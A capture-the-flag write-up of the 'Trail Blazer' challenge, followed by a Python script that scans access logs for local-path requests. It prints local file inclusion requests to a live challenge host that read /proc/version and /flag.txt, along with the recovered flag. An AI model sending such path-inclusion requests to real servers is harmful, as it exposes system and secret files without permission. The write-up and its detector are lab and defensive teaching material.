Technovate2022 - Forensics - Trail Blazer


Trail Blazer

description

I just made this cool website that acts as your own personal web browser!

Why is this cool? Well… I wrote it! Anyway, check it out and let me know if there are any features you would like to see added!

Hint: You just need to search for /flag.txt.

writeup

Upon opening the website in my browser, I am presented with the following form:

[Screenshot: /images/trailblazer_search.png]

If I try to input any URL, e.g. google.com, I get redirected to this page: http://host3.metaproblems.com:4110/blaze.php?page=google.com

But I get an error:

Could not open file.

So it looks like the program treats the value of the page parameter as the path of a single local file and includes it.

Let’s try something like: /proc/version

The GET request would look like this:

http://host3.metaproblems.com:4110/blaze.php?page=/proc/version

And I get the following response:

Linux version 4.19.0-22-cloud-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.260-1 (2022-09-29)

So that confirms that the local file inclusion (LFI) technique is in fact working.

Since the hint for this challenge says "You just need to search for /flag.txt", we can just get the flag like so:

http://host3.metaproblems.com:4110/blaze.php?page=/flag.txt

MetaCTF{blazing_paths_will_blaze_your_app_t00}
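From the defender's side, the requests in this writeup stand out in an access log because the form is meant to receive a web address, not a filesystem path. The following is an added example, not part of the original writeup or the challenge's code: it scans constructed log lines for blaze.php requests whose page value is not a host or http(s) URL. The log lines, the function names and the assumption that legitimate values are always web addresses are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the challenge server).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Dec/2022:10:00:01 +0000] "GET /blaze.php?page=google.com HTTP/1.1" 200 512
192.0.2.10 - - [01/Dec/2022:10:00:09 +0000] "GET /blaze.php?page=/proc/version HTTP/1.1" 200 160
192.0.2.11 - - [01/Dec/2022:10:00:15 +0000] "GET /blaze.php?page=https://example.com/news HTTP/1.1" 200 2048
192.0.2.10 - - [01/Dec/2022:10:00:21 +0000] "GET /blaze.php?page=%2Fflag.txt HTTP/1.1" 200 47
192.0.2.12 - - [01/Dec/2022:10:00:30 +0000] "GET /index.php HTTP/1.1" 200 900
"""

# client address, request target and status code of one log line
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def is_web_address(value):
    """True if value is what the form expects: a host name or an http(s) URL."""
    candidate = value if "://" in value else "http://" + value
    try:
        parts = urlsplit(candidate)
    except ValueError:          # malformed input is never a valid web address
        return False
    return parts.scheme in ("http", "https") and bool(parts.hostname)


def find_local_path_requests(log_text, script="/blaze.php", param="page"):
    """Return (client, decoded value, status) for every request to `script`
    whose `param` value is not a web address, e.g. an absolute local path."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        url = urlsplit(target)
        if url.path != script:
            continue
        # parse_qs percent-decodes once, like the server does for the query string
        for value in parse_qs(url.query).get(param, []):
            if not is_web_address(value):
                hits.append((client, value, int(status)))
    return hits


if __name__ == "__main__":
    for client, value, status in find_local_path_requests(SAMPLE_LOG):
        print(f"{client} requested local path {value!r} (HTTP {status})")
```

A 200 status on a flagged line is the case to look at first, since it means the server answered the request instead of rejecting it.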